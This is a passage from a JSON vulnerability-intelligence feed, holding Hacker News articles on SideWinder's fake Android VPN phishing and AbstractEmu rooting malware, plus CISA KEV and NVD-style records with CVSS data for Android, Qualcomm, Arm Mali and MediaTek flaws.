fraudulent links that are designed to mimic legitimate notifications and services of government agencies and organizations in Pakistan, with the group also setting up lookalike websites posing as government portals to harvest user credentials.\n\nThe custom tool identified by Group-IB, dubbed **SideWinder.AntiBot.Script**, acts as a traffic direction system diverting Pakistani users clicking on the phishing links to rogue domains.\n\nShould a user, whose client's IP address differs from Pakistan's, click on the link, the AntiBot script redirects to an authentic document located on a legitimate server, indicating an attempt to geofence its targets.\n\n\"The script checks the client browser environment and, based on several parameters, decides whether to issue a malicious file or redirect to a legitimate resource,\" the researchers said.\n\nOf special mention is a phishing link that downloads a VPN application called Secure VPN (\"com.securedata.vpn\") from the official Google Play store in an attempt to impersonate the legitimate Secure VPN app (\"com.securevpn.securevpn\").\n\n[![Fake Android VPN Apps](https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiRRXFZagNzSZWfAgOiKTH7XWRRQUEMEOpSQz-ybRkzKdN1kCt9FfTr5FCrwo0xyHYKj462x8J22imgQvE2Ut4BqlM0hsQyhkTMX6WlD3z1GBN0_HzymTbv_DeUyRqH5DhhaE52PXmz9DhuL8UGDKT1u0mCPyLnQJXhln7DnU1VVw9fDMNTa_CfHmyn/s728-e1000/pakistani-hackers-1.jpg)](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiRRXFZagNzSZWfAgOiKTH7XWRRQUEMEOpSQz-ybRkzKdN1kCt9FfTr5FCrwo0xyHYKj462x8J22imgQvE2Ut4BqlM0hsQyhkTMX6WlD3z1GBN0_HzymTbv_DeUyRqH5DhhaE52PXmz9DhuL8UGDKT1u0mCPyLnQJXhln7DnU1VVw9fDMNTa_CfHmyn/s728-e100/pakistani-hackers-1.jpg>)\n\nWhile the exact purpose of the fake VPN app remains unclear, this is not the first time SideWinder has sneaked past Google Play Store protections to publish rogue apps under the pretext of utility software.\n\nIn January 2020, Trend Micro [detailed](<https://www.trendmicro.com/en_us/research/20/a/first-active-attack-exploiting-cve-2019-2215-found-on-google-play-linked-to-sidewinder-apt-group.html>) three malicious apps that were disguised as photography and file manager tools that leveraged a security flaw in Android ([CVE-2019-2215](<https://thehackernews.com/2019/10/android-kernel-vulnerability.html>)) to gain root privileges as well as abuse accessibility service permissions to harvest sensitive information.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T09:09:00", "type": "thn", "title": "SideWinder Hackers Use Fake Android VPN Apps to Target Pakistani Entities", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215"], "modified": "2022-06-03T03:22:14", "id": "THN:EC10AE2E48A69D256BF21E48AE391477", "href": "https://thehackernews.com/2022/06/sidewinder-hackers-use-fake-android-vpn.html", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:09", "description": "[![Android Malware](https://thehackernews.com/images/-Eg_BMcr3cEU/YXv8foGrnrI/AAAAAAAA4e4/XOaYvOvH-Xov9DQOXBog51vKaH26J_W6wCLcBGAsYHQ/s728-e1000/android-rooting-malware.png)](<https://thehackernews.com/images/-Eg_BMcr3cEU/YXv8foGrnrI/AAAAAAAA4e4/XOaYvOvH-Xov9DQOXBog51vKaH26J_W6wCLcBGAsYHQ/s0/android-rooting-malware.png>)\n\nAn unidentified threat actor has been linked to a new Android malware strain that features the ability to root smartphones and take complete control over infected smartphones while simultaneously taking steps to evade detection.\n\nThe malware has been named \"[AbstractEmu](<https://blog.lookout.com/lookout-discovers-global-rooting-malware-campaign>)\" owing to its use of code abstraction and anti-emulation checks undertaken to thwart analysis right from the moment the apps are opened. Notably, the global mobile campaign is engineered to target and infect as many devices as possible indiscriminately.\n\nLookout Threat Labs said it found a total of [19 Android applications](<https://www.lookout.com/Uploads/csv/App_IOCs.csv>) that posed as utility apps and system tools like password managers, money managers, app launchers, and data saving apps, seven of which contained the rooting functionality. Only one of the rogue apps, called Lite Launcher, made its way to the official Google Play Store, attracting a total of 10,000 downloads before it was purged.\n\nThe apps are said to have been prominently distributed via third-party stores such as the Amazon Appstore and the Samsung Galaxy Store, as well as other lesser-known marketplaces like Aptoide and APKPure.\n\n[![Android Malware](https://thehackernews.com/new-images/img/a/AVvXsEh-pmYFJiHsfaLvAV3mbMDZmpQpBhjUq179EWr7PhopEEW18ZqusCJjniA20sJU5V7AQru6PbVLGWgPGzVFkyGEUe8f3Gt9fJAGpzqpMFluHozfpz2ZC9rpRFFagwznluR1dnnwVEWOj4y-ZkIpz84qD7nKs7ye3xifDJdDyHc-A8BudQ7bwGFju06x=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEh-pmYFJiHsfaLvAV3mbMDZmpQpBhjUq179EWr7PhopEEW18ZqusCJjniA20sJU5V7AQru6PbVLGWgPGzVFkyGEUe8f3Gt9fJAGpzqpMFluHozfpz2ZC9rpRFFagwznluR1dnnwVEWOj4y-ZkIpz84qD7nKs7ye3xifDJdDyHc-A8BudQ7bwGFju06x>)\n\n\"While rare, rooting malware is very dangerous. By using the rooting process to gain privileged access to the Android operating system, the threat actor can silently grant themselves dangerous permissions or install additional malware \u2014 steps that would normally require user interaction,\" Lookout researchers said. \"Elevated privileges also give the malware access to other apps' sensitive data, something not possible under normal circumstances.\"\n\nOnce installed, the attack chain is designed to leverage one of five exploits for older Android security flaws that would allow it to gain root permissions and take over the device, extract sensitive data, and transmit to a remote attack-controlled server \u2014\n\n * [CVE-2015-3636](<https://source.android.com/security/bulletin/2016-05-01>) (PongPongRoot)\n * [CVE-2015-1805](<https://source.android.com/security/bulletin/2015-09-01>) (iovyroot)\n * [CVE-2019-2215](<https://source.android.com/security/bulletin/2019-10-01>) (Qu1ckr00t)\n * [CVE-2020-0041](<https://source.android.com/security/bulletin/2020-03-01>), and\n * [CVE-2020-0069](<https://source.android.com/security/bulletin/2020-03-01>)\n\nLookout attributed the mass distributed rooting malware campaign to a \"well-resourced group with financial motivation,\" with telemetry data revealing that Android device users in the U.S. were the most impacted. The ultimate objective of the infiltrations remains unclear as yet.\n\n\"Rooting Android or jailbreaking iOS devices are still the most invasive ways to fully compromise a mobile device,\" the researchers said, adding \"mobile devices are perfect tools for cyber criminals to exploit, as they have countless functionalities and hold an immense amount of sensitive data.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-29T13:48:00", "type": "thn", "title": "This New Android Malware Can Gain Root Access to Your Smartphones", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1805", "CVE-2015-3636", "CVE-2019-2215", "CVE-2020-0041", "CVE-2020-0069"], "modified": "2021-10-30T13:06:58", "id": "THN:33EE2AABD7698C9F1FB70B5D087F8455", "href": "https://thehackernews.com/2021/10/this-new-android-malware-can-gain-root.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2023-07-21T17:22:44", "description": "Memory corruption due to improper check to return error when user application requests memory allocation of a huge size in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-01T00:00:00", "type": "cisa_kev", "title": "Qualcomm Multiple Chipsets Improper Input Validation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11261"], "modified": "2021-12-01T00:00:00", "id": "CISA-KEV-CVE-2020-11261", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Arm Mali Graphics Processing Unit (GPU) kernel driver contains a use-after-free vulnerability that may allow a non-privileged user to make improper operations on GPU memory to gain root privilege, and/or disclose information.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Arm Mali Graphics Processing Unit (GPU) Use-After-Free Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28663"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-28663", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Arm Mali Graphics Processing Unit (GPU) kernel driver contains an unspecified vulnerability that may allow a non-privileged user to gain write access to read-only memory, gain root privilege, corrupt memory, and modify the memory of other processes.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Arm Mali Graphics Processing Unit (GPU) Unspecified Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28664"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-28664", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Multiple Qualcomm Chipsets contain a use after free vulnerability due to improper handling of memory mapping of multiple processes simultaneously.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Qualcomm Multiple Chipsets Use-After-Free Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1905"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-1905", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Multiple Qualcomm chipsets contain a detection of error condition without action vulnerability when improper handling of address deregistration on failure can lead to new GPU address allocation failure.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Qualcomm Multiple Chipsets Detection of Error Condition Without Action Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1906"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-1906", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-07-21T17:22:44", "description": "Android Kernel contains a use-after-free vulnerability in binder.c which allows for privilege escalation from an application to the Linux Kernel. This vulnerability was observed chained with CVE-2020-0041 and CVE-2020-0069 under exploit chain \"AbstractEmu.\"", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Android Kernel Use-After-Free Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215", "CVE-2020-0041", "CVE-2020-0069"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-2215", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-09-29T16:32:36", "description": "Android Kernel binder_transaction of binder.c contains an out-of-bounds write vulnerability due to an incorrect bounds check that could allow for local privilege escalation. This vulnerability was observed chained with CVE-2019-2215 and CVE-2020-0069 under exploit chain \"AbstractEmu.\"", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Android Kernel Out-of-Bounds Write Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215", "CVE-2020-0041", "CVE-2020-0069"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-0041", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-09-29T16:32:36", "description": "Multiple MediaTek chipsets contain an insufficient input validation vulnerability and have missing SELinux restrictions in the Command Queue drivers ioctl handlers. This causes an out-of-bounds write leading to privilege escalation. This vulnerability was observed chained with CVE-2019-2215 and CVE-2020-0041 under exploit chain \"AbstractEmu.\"", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Mediatek Multiple Chipsets Insufficient Input Validation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2215", "CVE-2020-0041", "CVE-2020-0069"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-0069", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "prion": [{"lastseen": "2023-08-16T02:57:09", "description": "The Arm Mali GPU kernel driver allows privilege escalation or information disclosure because GPU memory operations are mishandled, leading to a use-after-free. This affects Bifrost r0p0 through r28p0 before r29p0, Valhall r19p0 through r28p0 before r29p0, and Midgard r4p0 through r30p0.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-10T15:15:00", "type": "prion", "title": "CVE-2021-28663", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28663"], "modified": "2023-02-23T22:15:00", "id": "PRION:CVE-2021-28663", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-28663", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T02:57:10", "description": "The Arm Mali GPU kernel driver allows privilege escalation or a denial of service (memory corruption) because an unprivileged user can achieve read/write access to read-only pages. This affects Bifrost r0p0 through r29p0 before r30p0, Valhall r19p0 through r29p0 before r30p0, and Midgard r8p0 through r30p0 before r31p0.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-10T15:15:00", "type": "prion", "title": "CVE-2021-28664", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28664"], "modified": "2022-10-27T21:15:00", "id": "PRION:CVE-2021-28664", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-28664", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T09:04:49", "description": "Memory corruption due to improper check to return error when user application requests memory allocation of a huge size in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-09T05:15:00", "type": "prion", "title": "CVE-2020-11261", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11261"], "modified": "2021-06-16T18:28:00", "id": "PRION:CVE-2020-11261", "href": "https://kb.prio-n.com/vulnerability/CVE-2020-11261", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T00:45:56", "description": "Improper handling of address deregistration on failure can lead to new GPU address allocation failure. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-07T09:15:00", "type": "prion", "title": "CVE-2021-1906", "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1906"], "modified": "2021-05-12T15:23:00", "id": "PRION:CVE-2021-1906", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-1906", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-08-16T00:45:57", "description": "Possible use after free due to improper handling of memory mapping of multiple processes simultaneously. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": 